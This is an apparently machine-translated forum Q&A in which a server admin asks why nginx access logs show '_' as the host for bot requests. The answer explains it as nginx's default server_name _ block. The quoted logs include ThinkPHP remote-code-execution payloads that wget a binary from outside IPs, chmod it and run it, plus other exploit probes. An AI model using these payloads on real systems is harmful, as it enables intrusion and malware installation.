下划线表示什么目的地?

下划线表示什么目的地?

我在用jwilder/nginx-proxy在公共互联网上可访问的服务器上。但实际上唯一重要的部分应该是 nginx。

我会定期检查各种 docker 项目的所有日志。当然,有很多机器人发出的请求试图攻击任何已知的漏洞……

有一件事我无法向自己解释:几乎所有可疑请求都没有显示真实域但只是强调作为目的地。以下是一些示例行:

proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:14:50:06 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | 1.my.RealIP.4 31.28.227.190 - - [12/Jun/2020:14:56:59 +0000] "GET / HTTP/1.0" 503 197 "-" "-"
proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:15:06:57 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET / HTTP/2.0" 200 3372 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET /favicon.ico HTTP/2.0" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | _ 76.71.2.171 - - [12/Jun/2020:15:25:46 +0000] "POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"
proxy_1  | nginx.1  | _ 116.99.130.146 - - [12/Jun/2020:15:29:40 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://51.77.73.39/bins/vciamangement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp GME.ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.158.248.210 - - [12/Jun/2020:15:37:41 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://167.71.185.210/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.202.2.147 - - [05/Jul/2020:20:45:34 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 150 "-" "-"

那么,有针对 a) 我的 IP b) 我的域名和 c)...下划线的请求? 这个下划线表示什么?

答案1

您使用的日志格式似乎被声明为,$host $remote_addr ...并且server在配置中的块中,您有一些默认server块,其中server_name _;存在指令。这些行来自未Host设置 HTTP 标头的请求。当该服务器块捕获此类请求时,变量的值$host将恰好为_(等于server_name指令中使用的字符串)。阅读有关$hostnginx 内部变量的更多信息这里. 并且你最好不要满足如下所述的请求回答。

相关内容